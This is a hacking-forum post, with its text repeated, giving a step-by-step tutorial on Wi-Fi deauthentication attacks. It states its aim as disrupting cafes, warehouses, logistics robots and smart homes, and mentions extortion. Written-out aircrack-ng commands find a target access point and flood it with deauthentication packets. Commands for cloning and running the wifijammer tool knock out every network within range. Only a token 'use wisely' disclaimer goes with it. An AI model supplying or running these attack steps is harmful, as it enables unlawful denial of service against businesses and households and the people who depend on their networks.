Father
Professional
- Messages
- 2,602
- Reaction score
- 751
- Points
- 113
Hi Anonymous. Today we'll talk about WI-FI networks. Now everything is so developed that in any cafe, bar or other place there are wireless networks for guests. Also, such technologies are used by shops, industrial facilities and enterprises.
Now imagine a peak situation when, for example, you need to unload a 100-ton container with fish, and the network is “lying”. It takes much longer to enter data manually and this is a very big problem. Or, for example, the absence of a network in a cafe, not all visitors will want to relax in an institution where there is no available access point.
Perhaps a wave of commercial terrorism and extortion is coming soon, with binding and childish pranks. Another 10 years and it will be very relevant. In addition to the TSD, there are other devices. For example, logistics centers include (in the West they have already included) logisticians' robots - loaders, assemblers, drones with cameras - in the workflow. Do not forget about the information panels that now stand on the streets of cities or in large centers and carry information. All this can be broken, hacked, disrupted the process, or simply stop work, which we will talk about today.
How do I deauthenticate a point?
Let's consider a specific case. For example, we need to put a specific point. To do this, you need to execute the commands, adapting to your interface. I will show with an example of an external antenna:
We put the card into monitoring mode.
Displaying the monitoring mode on the screen.
Choosing the first target.
Transferring the interface to the required frequency
Deauthentication.
After that, you can check the functionality. Clients will not be able to access. The program will constantly send packets that will deauthenticate.
How to do bulk deauthentication?
For example, there is no time to figure out which point you need to drown out, but you need to put absolutely the entire infrastructure. Then you need to use a tool such as wifijammer (the link can be used to see the information on the github). You also need to have an external WI-FI adapter, preferably several types of ALFA or TP-LINK. So, you can copy using the following command:
Next, you need to run the program in this mode, if we want to put all absolutely WI-FI networks within a radius of 50-100:
Deauthentication.
If you need to mute a specific point, then you must use the command:
Some routers have a setting that allows you to change channels when attacked by other programs, which interferes with the attack and forces the hacker to manually reconfigure the attack to another channel. This utility takes into account the moment. It automatically reconfigures and goes very quickly through other channels.
Conclusion
Use this information wisely. The article is provided for review. Remember that more and more smart devices are being connected to smart home systems, etc. And in such a simple way, you can partially paralyze the work of a company or a smart home system. If you liked the article, then in the next work I will show how you can make such a deauthenticator with the size of a pack of cigarettes and with a budget of $ 7-10. It will work from a power bank and, for these purposes, you will not need to use a laptop.
Now imagine a peak situation when, for example, you need to unload a 100-ton container with fish, and the network is “lying”. It takes much longer to enter data manually and this is a very big problem. Or, for example, the absence of a network in a cafe, not all visitors will want to relax in an institution where there is no available access point.
Perhaps a wave of commercial terrorism and extortion is coming soon, with binding and childish pranks. Another 10 years and it will be very relevant. In addition to the TSD, there are other devices. For example, logistics centers include (in the West they have already included) logisticians' robots - loaders, assemblers, drones with cameras - in the workflow. Do not forget about the information panels that now stand on the streets of cities or in large centers and carry information. All this can be broken, hacked, disrupted the process, or simply stop work, which we will talk about today.
How do I deauthenticate a point?
Let's consider a specific case. For example, we need to put a specific point. To do this, you need to execute the commands, adapting to your interface. I will show with an example of an external antenna:
Code:
sudo airmon-ng start wlxf4ec388df20f // put the card into monitoring mode.

We put the card into monitoring mode.
Code:
sudo airodump-ng mon0 // display monitoring mode to find the MAC point of our target. It is also necessary to remember the CH parameter on which the point of our goal works.

Displaying the monitoring mode on the screen.

Choosing the first target.
Code:
sudo airmon-ng start mon0 11 // transfer our interface to the frequency of the Wi-Fi point from 1 to 12; in my case, the mon0 interface appeared, you may have it called differently

Transferring the interface to the required frequency
Code:
sudo aireplay-ng --deauth 1000 mon0 -a A0: XX: XX: XX: XX -i mon0 –ignore-negative-one // start deauthentication

Deauthentication.
After that, you can check the functionality. Clients will not be able to access. The program will constantly send packets that will deauthenticate.
How to do bulk deauthentication?
For example, there is no time to figure out which point you need to drown out, but you need to put absolutely the entire infrastructure. Then you need to use a tool such as wifijammer (the link can be used to see the information on the github). You also need to have an external WI-FI adapter, preferably several types of ALFA or TP-LINK. So, you can copy using the following command:
Code:
git clone https://github.com/DanMcInerney/wifijammer.git
Next, you need to run the program in this mode, if we want to put all absolutely WI-FI networks within a radius of 50-100:
Code:
sudo python wifijammer.py

Deauthentication.
If you need to mute a specific point, then you must use the command:
Code:
sudo python wifijammer.py -a XX: XX: XX: XX: XX: XX -c 2
Some routers have a setting that allows you to change channels when attacked by other programs, which interferes with the attack and forces the hacker to manually reconfigure the attack to another channel. This utility takes into account the moment. It automatically reconfigures and goes very quickly through other channels.
Conclusion
Use this information wisely. The article is provided for review. Remember that more and more smart devices are being connected to smart home systems, etc. And in such a simple way, you can partially paralyze the work of a company or a smart home system. If you liked the article, then in the next work I will show how you can make such a deauthenticator with the size of a pack of cigarettes and with a budget of $ 7-10. It will work from a power bank and, for these purposes, you will not need to use a laptop.